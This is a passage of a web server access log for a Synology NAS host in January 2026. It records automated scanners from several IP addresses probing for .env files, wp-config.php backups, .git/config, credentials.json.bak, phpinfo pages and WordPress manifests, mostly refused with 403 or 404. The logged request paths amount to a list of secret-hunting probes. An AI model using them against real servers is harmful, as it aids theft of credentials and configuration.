8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/env.js" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 403 403 - GET https profibot.synology.me "/terraform/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/wp-config.php.old" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:40 +0000] - 404 404 - GET https profibot.synology.me "/index.js" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:41 +0000] - 403 403 - GET https profibot.synology.me "/tmp/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/api/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/config.json.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:41 +0000] - 403 403 - GET https profibot.synology.me "/run/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/vendor/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/application.yml.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/api/debug/phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/config/phpinfo.php" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:41 +0000] - 403 403 - GET https profibot.synology.me "/secrets/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:41 +0000] - 404 404 - GET https profibot.synology.me "/appsettings.json.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/_env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/_profiler/phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/_next/static/development/_devMiddlewareManifest.json" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/credentials.json.bak" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/config/database.yml" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:43 +0000] - 403 403 - GET https profibot.synology.me "/lambda/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:43 +0000] - 403 403 - GET https profibot.synology.me "/worker/.env" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/debug/phpinfo" [Client 45.148.10.23] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/next-config-manifest.json" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; SecurityScanner/1.0)" "-" +[18/Jan/2026:05:46:43 +0000] - 404 404 - GET https profibot.synology.me "/storage/logs/laravel.log" [Client 45.148.10.23] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:14:36:34 +0000] - - 301 - GET http profibot.synology.me "/" [Client 136.114.76.192] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:35 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 136.114.76.192] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:35 +0000] - 404 404 - GET https profibot.synology.me "//wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:35 +0000] - 404 404 - GET https profibot.synology.me "//xmlrpc.php?rsd" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:36 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 136.114.76.192] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:36 +0000] - 404 404 - GET https profibot.synology.me "//blog/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:36 +0000] - 404 404 - GET https profibot.synology.me "//web/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:36 +0000] - 404 404 - GET https profibot.synology.me "//wordpress/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:36 +0000] - 404 404 - GET https profibot.synology.me "//website/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:36 +0000] - 404 404 - GET https profibot.synology.me "//wp/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:37 +0000] - 404 404 - GET https profibot.synology.me "//news/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:37 +0000] - 404 404 - GET https profibot.synology.me "//2018/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:37 +0000] - 404 404 - GET https profibot.synology.me "//2019/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:37 +0000] - 404 404 - GET https profibot.synology.me "//shop/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:37 +0000] - 404 404 - GET https profibot.synology.me "//wp1/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:37 +0000] - 404 404 - GET https profibot.synology.me "//test/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:38 +0000] - 404 404 - GET https profibot.synology.me "//media/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:38 +0000] - 404 404 - GET https profibot.synology.me "//wp2/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:38 +0000] - 404 404 - GET https profibot.synology.me "//site/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:38 +0000] - 404 404 - GET https profibot.synology.me "//cms/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:38 +0000] - 404 404 - GET https profibot.synology.me "//sito/wp-includes/wlwmanifest.xml" [Client 136.114.76.192] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[18/Jan/2026:14:36:38 +0000] - - 400 - - https profibot.synology.me "-" [Client 136.114.76.192] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/.git/config" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/appsettings.json" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/server.js" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/.env" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/app.js" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/phpinfo.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/wp-config.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/info.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:24 +0000] - - 301 - GET http profibot.synology.me "/config.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/config.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/config.php" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/config.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 403 403 - GET https profibot.synology.me "/.git/config" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/.git/config" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/.git/config" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/appsettings.json" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/appsettings.json" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/appsettings.json" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/server.js" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/server.js" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/server.js" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 403 403 - GET https profibot.synology.me "/.env" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/.env" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/.env" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/app.js" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/app.js" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/app.js" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/phpinfo.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/phpinfo.php" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/phpinfo.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/wp-config.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/wp-config.php" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/wp-config.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/info.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/info.php" +[19/Jan/2026:02:48:26 +0000] - - 301 - GET http profibot.synology.me "/info.php" [Client 176.65.132.239] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "-" +[19/Jan/2026:02:48:26 +0000] - 404 404 - GET https profibot.synology.me "/config.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/config.php" +[19/Jan/2026:02:48:27 +0000] - 403 403 - GET https profibot.synology.me "/.git/config" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/.git/config" +[19/Jan/2026:02:48:27 +0000] - 404 404 - GET https profibot.synology.me "/appsettings.json" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/appsettings.json" +[19/Jan/2026:02:48:27 +0000] - 404 404 - GET https profibot.synology.me "/server.js" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/server.js" +[19/Jan/2026:02:48:27 +0000] - 403 403 - GET https profibot.synology.me "/.env" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/.env" +[19/Jan/2026:02:48:27 +0000] - 404 404 - GET https profibot.synology.me "/phpinfo.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/phpinfo.php" +[19/Jan/2026:02:48:27 +0000] - 404 404 - GET https profibot.synology.me "/wp-config.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/wp-config.php" +[19/Jan/2026:02:48:27 +0000] - 404 404 - GET https profibot.synology.me "/info.php" [Client 176.65.132.239] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; MALNJS; rv:11.0) like Gecko" "http://profibot.synology.me/info.php" +[19/Jan/2026:07:43:46 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 198.12.106.59] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:04:44:43 +0000] - - 301 - GET http profibot.synology.me "/" [Client 121.127.34.151] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53" "-" +[20/Jan/2026:04:44:44 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 121.127.34.151] [Length 2007] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A501 Safari/9537.53" "http://profibot.synology.me/" +[20/Jan/2026:12:55:53 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 74.7.241.132] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:15:54:10 +0000] - - 301 - GET http profibot.synology.me "/" [Client 34.53.5.158] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[20/Jan/2026:15:54:11 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 34.53.5.158] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://profibot.synology.me" +[21/Jan/2026:12:08:15 +0000] - - 301 - GET http profibot.synology.me "/" [Client 199.45.154.154] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:12:31:04 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 206.168.34.217] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:12:31:06 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_96.png?v=40438" [Client 206.168.34.217] [Length 2271] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:12:31:07 +0000] - 200 200 - GET https profibot.synology.me "/webman/favicon.ico?v=40438" [Client 206.168.34.217] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:12:31:08 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_64.png?v=40438" [Client 206.168.34.217] [Length 1312] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:12:31:09 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_48.png?v=40438" [Client 206.168.34.217] [Length 1099] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[21/Jan/2026:12:31:10 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/images/icon_dsm_32.png?v=40438" [Client 206.168.34.217] [Length 752] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[22/Jan/2026:23:54:31 +0000] - - 301 - GET http profibot.synology.me "/" [Client 208.84.101.154] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; 